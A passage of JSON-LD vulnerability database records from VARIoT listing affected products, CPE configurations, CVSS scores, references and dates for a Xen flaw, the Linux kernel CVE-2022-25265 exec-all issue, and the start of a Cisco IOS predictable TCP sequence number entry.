        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0151"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3515"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3496"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1919"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0217"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5510"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5511"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1918"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3496"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5512"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "49370"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "123421"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2901"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-539"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "49370"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "123421"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2901"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-539"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-08-30T00:00:00",
        "db": "BID",
        "id": "49370"
      },
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2013-10-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "date": "2011-09-07T00:57:26",
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "date": "2011-12-14T02:33:20",
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "date": "2012-01-30T12:12:00",
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "date": "2013-09-27T22:24:40",
        "db": "PACKETSTORM",
        "id": "123421"
      },
      {
        "date": "2013-10-01T17:55:00",
        "db": "NVD",
        "id": "CVE-2011-2901"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "date": "2011-09-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201108-539"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-10-09T01:25:00",
        "db": "BID",
        "id": "49370"
      },
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2013-10-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "date": "2023-02-13T04:31:00",
        "db": "NVD",
        "id": "CVE-2011-2901"
      },
      {
        "date": "2012-02-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "date": "2023-04-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201108-539"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Xen of  __addr_ok Service disruption in macro  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.6
  }
}

var-202202-1707
Vulnerability from variot

In the Linux kernel through 5.16.10, certain binary files may have the exec-all attribute if they were built in approximately 2003 (e.g., with GCC 3.2.2 and Linux kernel 2.4.20). This can cause execution of bytes located in supposedly non-executable regions of a file.

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202202-1707",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "baseboard management controller h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "baseboard management controller h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "baseboard management controller h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "baseboard management controller h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "baseboard management controller h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "baseboard management controller h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.16.10"
      },
      {
        "model": "baseboard management controller h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.16.10",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h300s_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h300s:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h500s_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h500s:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h700s_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h700s:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h300e_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h300e:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h500e_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h500e:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h700e_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h700e:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_h410s_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h410s:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller_h410c:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "cve": "CVE-2022-25265",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "id": "CVE-2022-25265",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2022-25265",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2022-25265",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202202-1368",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "In the Linux kernel through 5.16.10, certain binary files may have the exec-all attribute if they were built in approximately 2003 (e.g., with GCC 3.2.2 and Linux kernel 2.4.20). This can cause execution of bytes located in supposedly non-executable regions of a file.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ],
    "trust": 1.0
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-25265",
        "trust": 1.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "id": "VAR-202202-1707",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.6666667
  },
  "last_update_date": "2022-05-12T22:17:18.675000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=183903"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-913",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://github.com/x0reaxeax/exec-prot-bypass"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/blob/1c33bb0507508af24fd754dd7123bd8e997fab2f/arch/x86/include/asm/elf.h#l281-l294"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20220318-0005/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-25265"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-25265"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-02-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      },
      {
        "date": "2022-02-16T21:15:00",
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-03-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      },
      {
        "date": "2022-05-11T14:08:00",
        "db": "NVD",
        "id": "CVE-2022-25265"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Security hole",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-1368"
      }
    ],
    "trust": 0.6
  }
}

var-200105-0093
Vulnerability from variot

Cisco switches and routers running IOS 12.1 and earlier produce predictable TCP Initial Sequence Numbers (ISNs), which allows remote attackers to spoof or hijack TCP connections. Over the past several years, a variety of attacks against TCP initial sequence number (ISN) generation have been discussed. A vulnerability exists in some TCP/IP stack implementations that use random increments for initial sequence numbers. Such implementations are vulnerable to statistical attack, which could allow an attacker to predict, within a reasonable range, sequence numbers of future and existing connections. By predicting a sequence number, several attacks could be performed; an attacker could disrupt or hijack existing connections, or spoof future connections

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200105-0093",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ios",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "cisco",
        "version": "12.1"
      },
      {
        "model": "ios 11.2 xa",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "7.0"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.13"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.13"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.13"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.12"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.12"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.12"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.11"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.11"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.11"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.10"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.10"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
